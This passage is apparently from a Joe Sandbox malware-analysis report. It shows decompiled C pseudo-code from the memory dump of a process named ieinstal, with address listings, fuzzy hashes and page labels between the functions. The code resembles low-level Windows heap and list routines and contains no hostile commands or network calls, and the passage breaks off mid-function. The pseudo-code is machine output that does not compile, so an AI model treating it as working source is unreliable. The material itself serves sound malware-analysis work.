							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L20:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L20;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = E1EFD5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L23;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x1eff7e7a
0x1eff7e7e
0x1eff7e83
0x1eff7e8c
0x1f034994
0x00000000
0x1f034994
0x1eff7e96
0x1f034983
0x1eff7ecb
0x1eff7ed1
0x1eff7edd
0x1eff7ee3
0x1eff7eea
0x1eff7ef2
0x1eff7ef7
0x1eff7efc
0x1eff7f5b
0x1eff7f5b
0x1eff7f08
0x1eff7f0c
0x1eff7f11
0x1eff7f33
0x1eff7f39
0x1eff7f3c
0x1eff7f44
0x1eff7f4b
0x1eff7f4e
0x00000000
0x00000000
0x1eff7f50
0x1eff7f55
0x1eff7f61
0x1eff7f61
0x00000000
0x1eff7f61
0x1eff7f57
0x00000000
0x1eff7f57
0x1eff7f46
0x1eff7f46
0x1eff7f5f
0x00000000
0x1eff7f13
0x1eff7f13
0x1eff7f13
0x1eff7f18
0x1eff7f1c
0x1eff7f1e
0x1eff7f21
0x1eff7f24
0x1eff7f24
0x00000000
0x1eff7f27
0x1eff7f11
0x1f034989
0x1f03498e
0x1eff7ea7
0x1eff7eb2
0x1eff7eb7
0x1eff7ebc
0x00000000
0x1f03499e
0x1eff7ec4
0x1eff7ec8
0x00000000
0x1eff7ec8
0x00000000
0x1f03498e
0x1eff7e9c
0x1eff7ea1
0x00000000
0x1f0349a8
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 161d899d6470d8aefdca86791afdeb3b92e03b77d94b22e2c28bf33151d3e2d4
Instruction ID: d5e9dfe572735664a590ff2f02bdc9f2d42ef9a8380af38bd093bf7e1fd9a1bd
Opcode Fuzzy Hash: 161d899d6470d8aefdca86791afdeb3b92e03b77d94b22e2c28bf33151d3e2d4
Instruction Fuzzy Hash: DE318136A20611DBD725DF2AC460A6BB7E5AF85710706856EEC49DB2E0E770D840C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBEDFA Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E1EFBEDFA(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				unsigned int _t58;
				char _t63;
				unsigned int _t75;
				signed int _t80;
				intOrPtr _t83;
				void* _t85;

				_push(0x18);
				_push(0x1f09bb78);
				E1F017BE4(__ebx, __edi, __esi);
				_t83 = __ecx;
				 *((intOrPtr*)(_t85 - 0x28)) = __ecx;
				 *((char*)(_t85 - 0x1a)) = 0;
				 *((char*)(_t85 - 0x19)) = 0;
				 *((intOrPtr*)(_t85 - 0x20)) = 0;
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if(( *(__ecx + 0x40) & 0x75010f61) != 0 || ( *(__ecx + 0x40) & 0x00000002) == 0 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					_t48 = 0;
					_t63 = 1;
				} else {
					_t63 = 1;
					_t48 = 1;
				}
				if(_t48 == 0) {
					_t80 = 0xc000000d;
					goto L18;
				} else {
					E1EFCFED0( *((intOrPtr*)(_t83 + 0xc8)));
					 *((char*)(_t85 - 0x19)) = _t63;
					if( *((char*)(_t83 + 0xea)) == 2) {
						_t48 =  *(_t83 + 0xe4);
					} else {
						_t48 = 0;
					}
					if(_t48 != 0) {
						_t80 = 0;
						goto L18;
					} else {
						if( *((intOrPtr*)(_t83 + 0xe8)) != 0) {
							_t80 = 0xc000001e;
							L18:
							 *((intOrPtr*)(_t85 - 0x20)) = _t80;
							L19:
							_t64 = 0xffff;
							L14:
							 *((intOrPtr*)(_t85 - 4)) = 0xfffffffe;
							E1EFBEF5F(_t48, _t64, _t83);
							 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0x10));
							return _t80;
						}
						 *((short*)(_t83 + 0xe8)) = _t63;
						 *((char*)(_t85 - 0x1a)) = _t63;
						_t75 =  *0x1f0b3928; // 0x4000
						_t72 = _t83;
						_t80 = E1EFC1C50(_t83, (_t75 >> 3) + 2);
						 *((intOrPtr*)(_t85 - 0x20)) = _t80;
						if(_t80 < 0) {
							goto L19;
						}
						E1EFC12F3(_t83,  *((intOrPtr*)(_t83 + 0xb4)), _t72);
						 *(_t83 + 0xe4) =  *(_t83 + 0xe4) & 0x00000000;
						 *((char*)(_t83 + 0xea)) = 0;
						_push( *((intOrPtr*)(_t83 + 0xc8)));
						E1EFCE740(_t83);
						 *((char*)(_t85 - 0x19)) = 0;
						_t74 = _t83;
						 *(_t85 - 0x24) = E1EFBEF79(_t83);
						E1EFCFED0( *((intOrPtr*)(_t83 + 0xc8)));
						 *((char*)(_t85 - 0x19)) = _t63;
						_t56 =  *(_t85 - 0x24);
						if(_t56 == 0) {
							_t80 = 0xc0000017;
							 *((intOrPtr*)(_t85 - 0x20)) = 0xc0000017;
						} else {
							 *(_t83 + 0xe4) = _t56;
							 *((short*)(_t83 + 0xea)) = 0x202;
							if((E1EFC0670() & 0x00010000) == 0) {
								_t58 =  *0x1f0b3928; // 0x4000
								 *(_t83 + 0x6c) = _t58 >> 3;
							}
						}
						_t64 = 0xffff;
						 *((intOrPtr*)(_t83 + 0xe8)) =  *((intOrPtr*)(_t83 + 0xe8)) + 0xffff;
						 *((char*)(_t85 - 0x1a)) = 0;
						 *((char*)(_t85 - 0x19)) = 0;
						_push( *((intOrPtr*)(_t83 + 0xc8)));
						_t48 = E1EFCE740(_t74);
						goto L14;
					}
				}
			}

0x1efbedfa
0x1efbedfc
0x1efbee01
0x1efbee06
0x1efbee08
0x1efbee0d
0x1efbee10
0x1efbee13
0x1efbee16
0x1efbee20
0x1f01db26
0x1f01db2a
0x1efbee43
0x1efbee45
0x1efbee46
0x1efbee46
0x1efbee4a
0x1f01db30
0x00000000
0x1efbee50
0x1efbee56
0x1efbee5b
0x1efbee67
0x1f01db49
0x1efbee6d
0x1efbee6d
0x1efbee6d
0x1efbee71
0x1f01db54
0x00000000
0x1efbee77
0x1efbee7e
0x1f01db37
0x1f01db3c
0x1f01db3c
0x1f01db3f
0x1f01db3f
0x1efbef41
0x1efbef41
0x1efbef48
0x1efbef52
0x1efbef5e
0x1efbef5e
0x1efbee84
0x1efbee8b
0x1efbee8e
0x1efbee9a
0x1efbeea1
0x1efbeea3
0x1efbeea8
0x00000000
0x00000000
0x1efbeeb7
0x1efbeebc
0x1efbeec3
0x1efbeeca
0x1efbeed0
0x1efbeed5
0x1efbeed9
0x1efbeee0
0x1efbeee9
0x1efbeeee
0x1efbeef1
0x1efbeef6
0x1f01db58
0x1f01db5d
0x1efbeefc
0x1efbeefc
0x1efbef02
0x1efbef15
0x1efbef17
0x1efbef1f
0x1efbef1f
0x1efbef15
0x1efbef22
0x1efbef27
0x1efbef2e
0x1efbef32
0x1efbef36
0x1efbef3c
0x00000000
0x1efbef3c
0x1efbee71

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff82c1a4033967a9dbbec095dda7d6f655b831f044da2eaed68f9be58bf71ff
Instruction ID: f38fad2c33d189fe4e9ae61bd633269688f9c71f582b7ddcef5a008578e31094
Opcode Fuzzy Hash: aff82c1a4033967a9dbbec095dda7d6f655b831f044da2eaed68f9be58bf71ff
Instruction Fuzzy Hash: 17410332A0978ACFDB20DF64C4607DEB7F2BF45304F144A2EE89AAB240D735A404D758

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC7DB6 Relevance: .1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1EFC7DB6(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				signed char _t33;
				char* _t43;
				void* _t48;
				signed char _t62;
				void* _t63;
				void* _t80;
				void* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E1EFD3C40() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E1F094F1D(_v8, _t80);
					}
					L1EFD2330(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E1EFD24D0(_t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E1F0949AD(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E1EFD24D0(_t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E1F0046B0();
						if(_a4 != 0) {
							L1EFD2330(_t48, _t81);
						}
					} else {
						_t13 = _t80 + 0x98; // 0x98
						E1EFC754C(_v8 + 0xc, _t13);
						_t16 = _t80 + 0xb0; // 0xb0
						E1EFC754C(_v8 + 8, _t16);
						E1EFC77F9(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E1EFD24D0(_t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E1EFD24D0(_t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t7 = _t80 + 0x90; // 0x90
					E1EFD24D0(_t7);
				}
				return 0;
			}

0x1efc7dc1
0x1efc7dc3
0x1efc7dc5
0x1efc7dcf
0x1efc7dd4
0x1efc7e10
0x1efc7e1a
0x1f021865
0x1efc7e20
0x1efc7e20
0x1efc7e20
0x1efc7e28
0x1f021874
0x1f021874
0x1efc7e2f
0x1efc7e3b
0x1f02187f
0x1f021884
0x1f02188b
0x1f02188b
0x1f021896
0x1f02189b
0x1f0218a2
0x1f0218a7
0x1f0218a9
0x1f0218aa
0x1f0218ab
0x1f0218b3
0x1f0218ba
0x1f0218ba
0x1efc7e41
0x1efc7e44
0x1efc7e4d
0x1efc7e55
0x1efc7e5e
0x1efc7e68
0x1efc7e70
0x1efc7e76
0x1efc7e7b
0x1efc7e81
0x1efc7e87
0x1efc7e8d
0x1efc7e96
0x1efc7e98
0x1efc7e9f
0x1efc7e9f
0x1efc7ea4
0x1efc7ea4
0x00000000
0x1efc7ea6
0x1efc7dd8
0x1efc7dde
0x1efc7de7
0x1efc7df2
0x1efc7df9
0x1efc7df9
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
Instruction ID: 7712e4a021913d405d97016953cb9282f279311ae3b643b847a66cc52d06476e
Opcode Fuzzy Hash: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
Instruction Fuzzy Hash: CD31097AA016C7BEE705DB74C4A0FD9FB95BF42214F24869AC81C47241DB347949CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBDE45 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E1EFBDE45(intOrPtr __ecx, intOrPtr _a4) {
				void* _v32;
				intOrPtr _v60;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _v88;
				intOrPtr _v92;
				void* _v96;
				void* _v100;
				void* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t63;
				intOrPtr* _t66;
				void* _t69;
				short* _t72;
				short _t74;
				intOrPtr _t75;
				intOrPtr* _t78;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr* _t90;
				char _t94;
				void* _t107;
				intOrPtr _t112;
				char _t114;
				void* _t115;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr _t119;
				intOrPtr* _t122;
				void* _t123;
				intOrPtr _t124;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr _t137;
				short* _t138;
				void* _t139;
				void* _t141;
				short* _t143;
				intOrPtr _t145;
				void* _t147;
				signed int _t152;
				signed int _t154;
				signed int _t155;

				_t63 =  *0x1f0b664c; // 0x333c1b8
				_t112 = __ecx;
				L1EFC53C0(_t63 + 0x18);
				_t117 =  *0x1f0b664c; // 0x333c1b8
				_t1 = _t117 + 0x10; // 0x333c1c8
				_t132 = _t1;
				_t66 =  *_t132;
				while(_t66 != _t132) {
					_t2 = _t66 - 8; // -8
					_t143 = _t2;
					if( *((intOrPtr*)(_t143 + 4)) != _t112) {
						_t66 =  *_t66;
						continue;
					} else {
						asm("lock inc dword [esi+0x14]");
						_t130 =  *0x1f0b664c; // 0x333c1b8
						E1EFC52F0(_t130 + 0x18, _t130 + 0x18);
						L4:
						_t72 = _t143;
						L5:
						return _t72;
					}
					L33:
				}
				_t4 = _t117 + 0x18; // 0x333c1d0
				E1EFC52F0(_t117, _t4);
				_t69 = 0x18;
				_t143 = E1EFD5D90(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t69);
				if(_t143 == 0) {
					_t72 = 0;
					goto L5;
				} else {
					 *((intOrPtr*)(_t143 + 8)) = 0;
					 *((intOrPtr*)(_t143 + 0xc)) = 0;
					 *_t143 = 0x913;
					_t74 = 0x18;
					 *((short*)(_t143 + 2)) = _t74;
					_t75 =  *0x1f0b664c; // 0x333c1b8
					 *((intOrPtr*)(_t143 + 4)) = _t112;
					 *((intOrPtr*)(_t143 + 0x14)) = 1;
					 *((intOrPtr*)(_t143 + 0x10)) = 0;
					L1EFD2330(_t75 + 0x18, _t75 + 0x18);
					_t137 =  *0x1f0b664c; // 0x333c1b8
					_t12 = _t137 + 0x10; // 0x333c1c8
					_t78 = _t12;
					_t118 =  *_t78;
					if(_t118 != _t78) {
						while(1) {
							_t138 = _t118 - 8;
							if( *((intOrPtr*)(_t138 + 4)) == _t112) {
								break;
							}
							_t118 =  *_t118;
							if(_t118 != _t78) {
								continue;
							} else {
								_t137 =  *0x1f0b664c; // 0x333c1b8
								goto L8;
							}
							goto L33;
						}
						asm("lock inc dword [edi+0x14]");
						_t119 =  *0x1f0b664c; // 0x333c1b8
						E1EFD24D0(_t119 + 0x18);
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t143);
						_t72 = _t138;
						goto L5;
					} else {
						L8:
						_t13 = _t78 + 4; // 0x333c1c8
						_t133 =  *_t13;
						_t14 = _t143 + 8; // 0x8
						_t122 = _t14;
						if( *_t133 != _t78) {
							_t123 = 3;
							asm("int 0x29");
							_t154 = (_t152 & 0xfffffff8) - 0x4c;
							 *(_t154 + 0x48) =  *0x1f0bb370 ^ _t154;
							_push(_t112);
							_push(_t143);
							_t83 = _t133;
							_t114 = 0;
							_push(_t137);
							_v84 = _t83;
							_t139 = _t123;
							_t145 =  *((intOrPtr*)(_t83 + 0xc8));
							_v80 = _t145;
							E1F008F40( &_v72, 0, 0x30);
							_t86 =  *((intOrPtr*)(_t139 + 0x70));
							_t155 = _t154 + 0xc;
							_v88 = _t86;
							_t87 = _t86;
							if(_t87 == 0) {
								_push(5);
								 *((char*)(_t139 + 0x6a)) = 0;
								 *((intOrPtr*)(_t139 + 0x6c)) = 0;
								goto L15;
							} else {
								_t107 = _t87 - 1;
								if(_t107 != 0) {
									if(_t107 == 1) {
										_push(0xa);
										goto L15;
									} else {
										_t94 = 0;
									}
								} else {
									_push(4);
									L15:
									_pop(_t88);
									_v92 = _t88;
									if(_a4 == _t114 && _t145 != 0 && _t88 != 0xa &&  *((char*)(_t139 + 0x6b)) == 1) {
										L1EFD2330(_t88, _t145 + 0x1c);
										_t128 = _v84;
										 *((intOrPtr*)(_t128 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
										 *((intOrPtr*)(_t128 + 0x88)) =  *((intOrPtr*)(_t139 + 0x68));
										 *((intOrPtr*)(_t128 + 0x8c)) =  *((intOrPtr*)(_t139 + 0x6c));
										 *((intOrPtr*)(_t128 + 0x90)) = _v92;
										 *((intOrPtr*)(_t128 + 0x20)) = _t114;
										E1EFD24D0(_t145 + 0x1c);
									}
									_t124 = _v92;
									_t90 =  *((intOrPtr*)(_v84 + 0x20));
									_t133 =  *_t90;
									_v84 =  *((intOrPtr*)(_t90 + 4));
									 *((intOrPtr*)(_t155 + 0x28)) =  *((intOrPtr*)(_t139 + 0x68));
									_v72 = 0x30;
									 *((intOrPtr*)(_t155 + 0x24)) = _t124;
									_v60 =  *((intOrPtr*)(_t139 + 0x6c));
									asm("movsd");
									_v88 = _t133;
									_v76 = 0x30;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									if(_t133 != 0) {
										 *0x1f0b91e0(_t124, _v84,  &_v76,  &_v72);
										_t114 = _v88();
									}
									_t94 = _t114;
								}
							}
							_pop(_t141);
							_pop(_t147);
							_pop(_t115);
							return E1F004B50(_t94, _t115,  *(_t155 + 0x54) ^ _t155, _t133, _t141, _t147);
						} else {
							 *_t122 = _t78;
							 *((intOrPtr*)(_t122 + 4)) = _t133;
							 *_t133 = _t122;
							 *((intOrPtr*)(_t78 + 4)) = _t122;
							_t17 = _t137 + 0x18; // 0x333c1d0
							E1EFD24D0(_t17);
							goto L4;
						}
					}
				}
				goto L33;
			}

0x1efbde45
0x1efbde50
0x1efbde53
0x1efbde58
0x1efbde5e
0x1efbde5e
0x1efbde61
0x1efbde63
0x1efbde67
0x1efbde67
0x1efbde6d
0x1f01d69b
0x00000000
0x1efbde73
0x1efbde73
0x1efbde77
0x1efbde81
0x1efbde86
0x1efbde86
0x1efbde88
0x1efbde8b
0x1efbde8b
0x00000000
0x1efbde6d
0x1efbde8c
0x1efbde90
0x1efbde97
0x1efbdeaa
0x1efbdeae
0x1efbdf15
0x00000000
0x1efbdeb0
0x1efbdeb0
0x1efbdeb8
0x1efbdebb
0x1efbdec0
0x1efbdec1
0x1efbdec5
0x1efbdecd
0x1efbded1
0x1efbded8
0x1efbdedb
0x1efbdee0
0x1efbdee6
0x1efbdee6
0x1efbdee9
0x1efbdeed
0x1f01d6a2
0x1f01d6a2
0x1f01d6a8
0x00000000
0x00000000
0x1f01d6aa
0x1f01d6ae
0x00000000
0x1f01d6b0
0x1f01d6b0
0x00000000
0x1f01d6b0
0x00000000
0x1f01d6ae
0x1f01d6bb
0x1f01d6bf
0x1f01d6c9
0x1f01d6db
0x1f01d6e0
0x00000000
0x1efbdef3
0x1efbdef3
0x1efbdef3
0x1efbdef3
0x1efbdef6
0x1efbdef6
0x1efbdefb
0x1efbdf1e
0x1efbdf1f
0x1efbdf29
0x1efbdf33
0x1efbdf37
0x1efbdf38
0x1efbdf39
0x1efbdf3b
0x1efbdf3d
0x1efbdf40
0x1efbdf44
0x1efbdf46
0x1efbdf52
0x1efbdf56
0x1efbdf5b
0x1efbdf5e
0x1efbdf61
0x1efbdf65
0x1efbdf67
0x1efbe058
0x1efbe05a
0x1efbe05d
0x00000000
0x1efbdf6d
0x1efbdf6d
0x1efbdf70
0x1f01d6ea
0x1f01d6f3
0x00000000
0x1f01d6ec
0x1f01d6ec
0x1f01d6ec
0x1efbdf76
0x1efbdf76
0x1efbdf78
0x1efbdf78
0x1efbdf79
0x1efbdf80
0x1efbe019
0x1efbe024
0x1efbe02c
0x1efbe032
0x1efbe03b
0x1efbe045
0x1efbe04b
0x1efbe04e
0x1efbe04e
0x1efbdf8d
0x1efbdf91
0x1efbdf94
0x1efbdf99
0x1efbdfa0
0x1efbdfab
0x1efbdfb3
0x1efbdfb7
0x1efbdfbb
0x1efbdfbc
0x1efbdfc0
0x1efbdfc8
0x1efbdfc9
0x1efbdfca
0x1efbdfcd
0x1efbdfe0
0x1efbdfea
0x1efbdfea
0x1efbdfec
0x1efbdfec
0x1efbdf70
0x1efbdff2
0x1efbdff3
0x1efbdff4
0x1efbdfff
0x1efbdefd
0x1efbdefd
0x1efbdeff
0x1efbdf02
0x1efbdf04
0x1efbdf07
0x1efbdf0b
0x00000000
0x1efbdf0b
0x1efbdefb
0x1efbdeed
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2a65a7e4071de9d7381d48e7b19595f319de5e2657b222641fb143fc6bbb4f
Instruction ID: 5754794e3964d706842865ca852c242b4431656ab5c8c2fba5290a2ba9e1485b
Opcode Fuzzy Hash: 9b2a65a7e4071de9d7381d48e7b19595f319de5e2657b222641fb143fc6bbb4f
Instruction Fuzzy Hash: 56319EB6201642DFC324DF19D8A0A56B7B5FF44318B548A9ED80A8B751DB32F846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1F085D43 Relevance: .1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E1F085D43(intOrPtr* __ecx, intOrPtr* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr* _t53;
				signed int _t58;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t67;

				_v8 =  *0x1f0bb370 ^ _t67;
				_v16 =  *__edx;
				_t53 = __ecx;
				_v12 =  *((intOrPtr*)(__edx + 4));
				_t63 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1000);
				if(_t63 != 0) {
					do {
						_v20 = 0x1000;
						_push( &_v20);
						_push(_t63);
						_push( &_v24);
						_push(0);
						_push(0);
						_push( &_v16);
						_t64 = E1F003FE0();
						if(_t64 < 0) {
							goto L12;
						}
						asm("sbb ecx, ecx");
						_t62 = 0;
						_t58 =  !( ~(_v20 & 7)) & _v20;
						_v20 = _t58;
						_t66 = _t58 >> 3;
						if(_t66 == 0) {
							L9:
							_t19 = _t58 + 8; // 0x1008
							_t62 = _t19;
							if(_t62 <= 0x1000) {
								_t58 = _t62;
								 *((intOrPtr*)(_t63 + _t66 * 8)) =  *_t53;
								_t22 = _t53 + 4; // 0x8b55ff8b
								 *((short*)(_t63 + 4 + _t66 * 8)) =  *_t22;
								_v20 = _t58;
							}
							L11:
							_push(1);
							_push(_v24);
							_push(0);
							_push(0);
							_push(_t58);
							_push(_t63);
							_push( &_v16);
							_t64 = E1F004690();
							goto L12;
						}
						_t51 =  *_t53;
						do {
							if( *((intOrPtr*)(_t63 + _t62 * 8)) != _t51) {
								goto L8;
							}
							_t18 = _t53 + 4; // 0x8b55ff8b
							if( *((intOrPtr*)(_t63 + 4 + _t62 * 8)) ==  *_t18) {
								goto L11;
							}
							_t51 =  *_t53;
							L8:
							_t62 = _t62 + 1;
						} while (_t62 < _t66);
						goto L9;
						L12:
					} while (_t64 == 0xc0000001);
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
					L14:
					return E1F004B50(_t64, _t53, _v8 ^ _t67, _t62, _t63, _t64);
				}
				_t64 = 0xc0000017;
				goto L14;
			}

0x1f085d52
0x1f085d59
0x1f085d5c
0x1f085d62
0x1f085d7a
0x1f085d7e
0x1f085d8a
0x1f085d8d
0x1f085d94
0x1f085d95
0x1f085d99
0x1f085d9a
0x1f085d9c
0x1f085da1
0x1f085da7
0x1f085dab
0x00000000
0x00000000
0x1f085db7
0x1f085db9
0x1f085dbd
0x1f085dc2
0x1f085dc5
0x1f085dca
0x1f085de5
0x1f085de5
0x1f085de5
0x1f085dee
0x1f085df2
0x1f085df4
0x1f085df7
0x1f085dfb
0x1f085e00
0x1f085e00
0x1f085e03
0x1f085e03
0x1f085e05
0x1f085e0b
0x1f085e0d
0x1f085e0f
0x1f085e10
0x1f085e11
0x1f085e17
0x00000000
0x1f085e17
0x1f085dcc
0x1f085dce
0x1f085dd1
0x00000000
0x00000000
0x1f085dd8
0x1f085ddc
0x00000000
0x00000000
0x1f085dde
0x1f085de0
0x1f085de0
0x1f085de1
0x00000000
0x1f085e19
0x1f085e19
0x1f085e31
0x1f085e36
0x1f085e46
0x1f085e46
0x1f085d80
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68cc13b2c0c11b6d3ad56f85486bccce79055eb80aae6ac5cb2fe8d297692e98
Instruction ID: 8e80f52415e77025f0dccb993f3990377136b878a549c0dbfbcc86afb9716c6d
Opcode Fuzzy Hash: 68cc13b2c0c11b6d3ad56f85486bccce79055eb80aae6ac5cb2fe8d297692e98
Instruction Fuzzy Hash: C331EF79E00216EBDB15DF68CC40BBEB7B5FB84750F014568E801AB288E7B0AC00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEEA40 Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1EFEEA40(signed int* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				signed int _t28;
				signed int _t30;
				signed int* _t42;
				signed int _t46;
				signed int* _t47;
				void* _t48;

				_t43 = __ecx;
				_v20 = _v20 | 0xffffffff;
				_t28 = 0;
				_t42 = 0;
				_v24 = 0xfd050f80;
				_t47 = 0;
				_v16 = 0;
				_t46 = 0;
				_v12 = 0;
				_v8 = 0;
				_t48 =  *0x1f0b664c - _t28; // 0x333c1b8
				if(_t48 != 0) {
					E1EFC7AF0(__ecx, _a12, _a8, 0, 0);
					_t30 = 0;
					L2:
					while(1) {
						do {
							L2:
							while(1) {
								if(_t47 != 0) {
									L5:
									_push(0x1030);
									_push(_t47);
									_push(_t46);
									_push(_t30);
									_push( &_v16);
									_push(_t42);
									if(E1F0038C0() >= 0) {
										_t43 = _t47;
										_t46 = E1EFEECF3(_t47, 0);
										if(_t46 == 0x103) {
											_t42 = 0;
											_t30 = 0;
											_v16 = _v16 & 0;
											_t46 = 0;
											_v12 = _v12 & 0;
											_t47 = 0;
											_v8 = 0;
											continue;
										} else {
											break;
										}
										goto L9;
									}
								} else {
									_t47 = E1EFD5D90(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t47, 0x1030);
									if(_t47 == 0) {
										_t28 = 0xc0000017;
									} else {
										_t30 = _v8;
										goto L5;
									}
								}
								if(_t28 != 0x8000001a) {
